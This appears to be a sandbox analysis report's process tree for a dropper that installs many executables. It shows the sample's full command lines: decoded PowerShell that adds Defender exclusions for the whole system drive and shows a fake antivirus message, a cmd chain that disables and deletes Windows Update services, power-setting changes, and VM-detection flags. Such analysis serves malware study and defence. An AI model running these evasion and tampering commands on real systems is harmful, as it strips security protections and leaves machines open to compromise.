C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,16592053720459048573,16019932122781940056,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,16592053720459048573,16019932122781940056,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1nfDK42⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c39947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,143610837064834116,16583740783386230664,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,143610837064834116,16583740783386230664,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1AbtZ42⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xb4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c39947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2560 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4508 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4588 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4628 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7688 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7704 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=8100 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6840 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe (level 4)
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff694bd5460,0x7ff694bd5470,0x7ff694bd5480
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6840 /prefetch:8
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2236,6132094797538857614,15007433720629100516,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3176 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1n6sL4
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c3994718
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,8979061879212629283,807440930091685079,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,8979061879212629283,807440930091685079,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RqtB4
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9c39946f8,0x7ff9c3994708,0x7ff9c3994718
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,13084215389252216617,11879332690124497779,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1956 /prefetch:2
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 3)
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,13084215389252216617,11879332690124497779,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:3
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe (level 2)
"C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\real.exe (level 2)
"C:\Program Files (x86)\Company\NewProduct\real.exe"
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Company\NewProduct\safert44.exe (level 2)
"C:\Program Files (x86)\Company\NewProduct\safert44.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe (level 2)
"C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\F0geI.exe (level 2)
"C:\Program Files (x86)\Company\NewProduct\F0geI.exe"
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exe (level 3)
C:\Windows\SysWOW64\WerFault.exe -u -p 6448 -s 760
- Program crash
-
C:\Program Files (x86)\Company\NewProduct\tag.exe (level 2)
"C:\Program Files (x86)\Company\NewProduct\tag.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\jshainx.exe (level 2)
"C:\Program Files (x86)\Company\NewProduct\jshainx.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe (level 2)
"C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe"
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe (level 3)
"C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZgB0ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAYwBhACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAQQBsAGwAIAB2AGkAcgB1AHMAZQBzACAAaABhAHMAIABiAGUAZQBuACAAZABlAGwAZQB0AGUAZAAnACwAJwAnACwAJwBPAEsAJwAsACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcAKQA8ACMAdgBkAGUAIwA+AA=="
Decoded (UTF-16LE base64, junk <#...#> comments stripped): Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('All viruses has been deleted','','OK','Information'). A decoy message box that imitates an antivirus result.
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaABlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAbABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AbAB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAcQBoACMAPgA="
Decoded (UTF-16LE base64, junk <#...#> comments stripped): Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force. This adds the whole user profile and system drive to the Microsoft Defender exclusion list (defense evasion); the Defender operational log and the MpPreference exclusion list are the places to check for it.
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Windows Defender.exe (level 4)
"C:\Users\Admin\Windows Defender.exe"
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe (level 5)
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Windows Defender.exe"
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 6)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAZQB2AHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAZgBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAaQB1AHUAIwA+AA=="
Decoded (UTF-16LE base64, junk <#...#> comments stripped): Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force. The same Defender exclusion as the earlier level-4 PowerShell command, repeated from the injected conhost.exe.
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe (level 6)
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
-
C:\Windows\system32\sc.exe (level 7)
sc stop UsoSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe (level 7)
sc stop WaaSMedicSvc
- Launches sc.exe
-
C:\Windows\system32\sc.exe (level 7)
sc stop wuauserv
- Launches sc.exe
-
C:\Windows\system32\sc.exe (level 7)
sc stop bits
- Launches sc.exe
-
C:\Windows\system32\sc.exe (level 7)
sc stop dosvc
- Launches sc.exe
-
C:\Windows\system32\reg.exe (level 7)
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (level 7)
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (level 7)
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (level 7)
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (level 7)
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
- Modifies registry key
-
C:\Windows\system32\takeown.exe (level 7)
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe (level 7)
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe (level 7)
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (level 7)
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (level 7)
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\reg.exe (level 7)
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
- Modifies registry key
-
C:\Windows\system32\schtasks.exe (level 7)
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
-
C:\Windows\system32\schtasks.exe (level 7)
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
-
C:\Windows\System32\cmd.exe (level 6)
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
-
C:\Windows\system32\powercfg.exe (level 7)
powercfg /x -hibernate-timeout-ac 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exe (level 7)
powercfg /x -hibernate-timeout-dc 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exe (level 7)
powercfg /x -standby-timeout-ac 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exe (level 7)
powercfg /x -standby-timeout-dc 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exe (level 6)
C:\Windows\System32\conhost.exe
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 6)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\svchost.exe (level 4)
"C:\Users\Admin\AppData\Local\svchost.exe"
- Enumerates VirtualBox DLL files
- Looks for VirtualBox drivers on disk
- Looks for VirtualBox executables on disk
- Executes dropped EXE
- Looks for VMWare drivers on disk
- Suspicious behavior: EnumeratesProcesses
-
